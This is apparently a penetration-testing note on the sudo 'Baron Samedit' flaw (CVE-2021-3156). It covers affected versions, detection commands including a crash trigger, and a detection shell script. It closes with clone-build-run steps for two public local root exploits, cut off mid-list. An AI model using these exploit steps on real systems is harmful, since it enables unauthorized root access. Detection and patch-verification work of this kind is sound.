Overview
CVE-2021-3156 ("Baron Samedit") is a heap-based buffer overflow in sudo's command-line argument handling. This vulnerability:
- is exploitable by any local user (normal users and system users, sudoers and non-sudoers), without authentication (i.e., the attacker does not need to know the user's password);
- was introduced in July 2011 (commit 8255ed69), and affects all legacy versions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to 1.9.5p1, in their default configuration;
- was exploited by Qualys for full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Other operating systems and distributions are probably also exploitable.
Sources
- https://www.youtube.com/watch?v=TLa2VqcGGEQ
- Whitepaper
Exploitation
Detect
- Check the versions of the distribution and of sudo. The affected ranges above are upstream version numbers; distributions backport the fix without bumping them (a patched Ubuntu 20.04 package still reports "Sudo version 1.8.31"), so the version alone does not prove the host is vulnerable and the sudoedit test below is needed to confirm
$ cat /etc/issue
Ubuntu 20.04.5 LTS \n \l
$ sudo -V
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
- Trigger the bug with a backslash-terminated argument to sudoedit -s. A vulnerable sudo aborts inside malloc(); a patched sudoedit rejects the -s option with a usage message and does not crash
$ sudoedit -s '123456789123456789\'
malloc(): invalid size (unsorted)
Aborted (core dumped)
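The two Detect steps above (version check, then sudoedit probe) as one script, added here as an example; it is not code from the original page or from the linked exploit repositories. It compares the "Sudo version" line against the affected ranges stated in the Overview, then runs the non-crashing probe from the Qualys advisory (`sudoedit -s /`: a vulnerable sudo complains that / is not a regular file, a patched one prints a usage error) and keeps the page's crash probe as a second function. The filename `check_sudo.sh` and the `check` argument are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page or the exploit repos):
# two-stage CVE-2021-3156 check. Stage 1 compares the upstream version,
# stage 2 asks sudoedit itself. Stage 1 alone is not enough, because
# distributions backport the fix without changing the version string.

# Extract "1.8.31" from the multi-line output of `sudo -V`.
sudo_version_from_output() {
    printf '%s\n' "$1" | sed -n 's/^Sudo version //p' | head -n 1
}

# Turn "1.8.31p2" into one comparable integer; a missing "pN" suffix
# counts as p0. Returns 1 for strings that are not MAJOR.MINOR.PATCH[pN].
version_key() {
    v=$1
    case $v in
        *.*.*) ;;
        *) return 1 ;;
    esac
    major=${v%%.*};    rest=${v#*.}
    minor=${rest%%.*}; rest=${rest#*.}     # e.g. "31p2" or "5"
    patch=${rest%%p*}
    case $rest in
        *p*) plevel=${rest#*p} ;;
        *)   plevel=0 ;;
    esac
    echo $(( major * 1000000 + minor * 10000 + patch * 100 + plevel ))
}

# 0 if the upstream version lies in an affected range:
# legacy 1.8.2 .. 1.8.31p2, stable 1.9.0 .. 1.9.5p1.
is_vulnerable_version() {
    k=$(version_key "$1") || return 1
    [ "$k" -ge 1080200 ] && [ "$k" -le 1083102 ] && return 0
    [ "$k" -ge 1090000 ] && [ "$k" -le 1090501 ] && return 0
    return 1
}

# Live probe A (Qualys advisory test, does not crash anything):
# vulnerable sudoedit accepts -s and complains about the file, patched
# sudoedit rejects -s with a usage message. 0 = vulnerable, 1 = patched,
# 2 = undetermined (e.g. sudo not installed).
probe_sudoedit_usage() {
    out=$(sudoedit -s / 2>&1)
    case $out in
        *"not a regular file"*) return 0 ;;
        *usage:*)               return 1 ;;
        *)                      return 2 ;;
    esac
}

# Live probe B (the crash test from the Detect section): a vulnerable
# sudo dies in malloc(); the shell reports death by signal as 128+signum.
probe_sudoedit_crash() {
    sudoedit -s '123456789123456789\' >/dev/null 2>&1
    rc=$?
    [ "$rc" -ge 128 ]
}

main() {
    v=$(sudo_version_from_output "$(sudo -V 2>/dev/null)")
    if [ -z "$v" ]; then
        echo "sudo not found or sudo -V printed no version"
        return 2
    fi
    if is_vulnerable_version "$v"; then
        echo "sudo $v: upstream version in an affected range"
    else
        echo "sudo $v: upstream version outside the affected ranges"
    fi
    rc=0
    probe_sudoedit_usage || rc=$?
    case $rc in
        0) echo "sudoedit -s / probe: VULNERABLE (sudoedit accepted -s)" ;;
        1) echo "sudoedit -s / probe: patched (usage error)" ;;
        *) echo "sudoedit -s / probe: undetermined" ;;
    esac
    return $rc
}

# Only run the live checks when explicitly asked, so the file can also
# be sourced for its functions.
if [ "${1-}" = check ]; then
    main
fi
```

Run it on the target as `sh check_sudo.sh check`; the exit status is 0 when sudoedit accepted `-s` (vulnerable), 1 when it printed a usage error (patched). Trust the probe over the version string: a host whose `sudo -V` says 1.8.31 can be either.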
Exploit
1. https://github.com/CptGibbon/CVE-2021-3156
# install
git clone https://github.com/CptGibbon/CVE-2021-3156.git
cd CVE-2021-3156
make
# on victim
./exploit
2. https://github.com/worawit/CVE-2021-3156
# install
git clone https://github.com/worawit/CVE-2021-3156.git
cd CVE-2021-3156
# choose one